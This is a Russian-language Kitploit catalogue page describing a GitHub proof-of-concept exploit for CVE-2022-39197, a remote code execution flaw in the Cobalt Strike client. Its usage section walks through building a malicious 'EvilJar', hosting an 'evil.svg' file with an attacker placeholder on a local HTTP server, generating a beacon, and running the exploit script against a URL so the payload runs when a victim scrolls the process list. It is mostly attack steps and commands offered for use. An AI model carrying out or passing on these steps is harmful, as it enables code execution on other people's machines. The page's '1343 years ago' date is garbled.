Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-39197-RCE — CVE-2022-39197 RCE POC | Kitploit
Инструменты/GitHubGitHub/thecryinggame/cve-2022-39197-rce
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPayload Development
GitHubthecryinggame/cve-2022-39197-rce

CVE-2022-39197-RCE

CVE-2022-39197 RCE POC

Репозиторий
1343 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-39197-RCE

Первое

Этот проект был изменён на основе проекта @its-arun https://github.com/its-arun/CVE-2022-39197

Когда я тестировал скрипт, я обнаружил, что frida-скрипт не мог запросить данные в обычном порядке. Метод изменения frida-скрипта для изменения имени процесса.

Спасибо мастеру @Kai5174 за его вклад в метод эксплуатации.

Использование

  • Подготовка полезной нагрузки

1、Отредактируйте команду, выполняемую с вашей полезной нагрузкой, в EvilJar/src/main/java/Exploit.java, сейчас она может только открыть калькулятор.

2、Соберите с помощью jar mvn clean compile assembly:single

4、Переместите EvilJar-1.0-jar-with-dependencies.jar из EvilJar/target/ в папку serve/

5、Отредактируйте serve\evil.svg замените [attacker]

6、Запустите сервер с помощью python3 -m http.server 8080

7、Сгенерируйте beacon.exe с версией C2 меньше или равной 4.7

8、Вам нужно выполнить py-скрипт на Windows, чтобы выйти в сеть, и принять контрмеры, когда клиент обращается к списку процессов и видит процесс beacon.exe.

  • Выполнение эксплойта
root@kitploit:~
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg

Полезная нагрузка будет запущена, как только пользователь прокрутит список процессов.

POC

Windows 1.png

Mac 2.jpg

Ссылки

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Есть отличный глубокий анализ этой уязвимости https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Модифицировано https://github.com/its-arun/CVE-2022-39197

Скачать инструмент